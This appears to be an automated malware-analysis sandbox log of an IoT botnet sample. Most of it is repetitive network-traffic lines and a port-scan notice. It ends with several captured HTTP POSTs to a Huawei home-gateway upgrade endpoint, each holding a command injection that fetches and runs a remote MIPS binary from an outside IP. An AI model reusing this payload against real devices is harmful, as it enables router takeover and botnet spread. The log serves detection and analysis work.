Source: unknown Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 48052 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53780 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 33852 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46844 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59546 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44216 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60430 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60422 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60440 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60432 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 60422
Source: unknown Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 60432
Source: unknown Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44216 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41826 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44216 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 38550 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 38806 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44512 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 38810 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44516 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53954 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 53954
Source: unknown Network traffic detected: HTTP traffic on port 53958 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 53958
Source: unknown Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53780 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58694 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44216 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39908 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58598 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58598 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59546 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 58598 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39908 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37414 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 52734 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37414 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60204 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60208 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52738 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58506 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58508 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58598 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37414 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39908 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37414 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 34670 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 34680 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 34742 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41400 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42850 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41416 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 34742 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58598 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39908 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 34742 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41654 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51620 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44520 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51628 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51620 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 37414 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 39498 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39502 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 56918 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53696 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53160 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 34742 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51620 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53706 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39908 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 56918 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53160 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 56918 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53160 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 33774 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45424 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 49110 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 33774
Source: unknown Network traffic detected: HTTP traffic on port 45428 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 33780 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 33780
Source: unknown Network traffic detected: HTTP traffic on port 49118 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51620 -> 52869
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 197.132.5.65 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 185.68.235.176 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 91.156.37.23 ports 2,5,6,8,9,52869
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
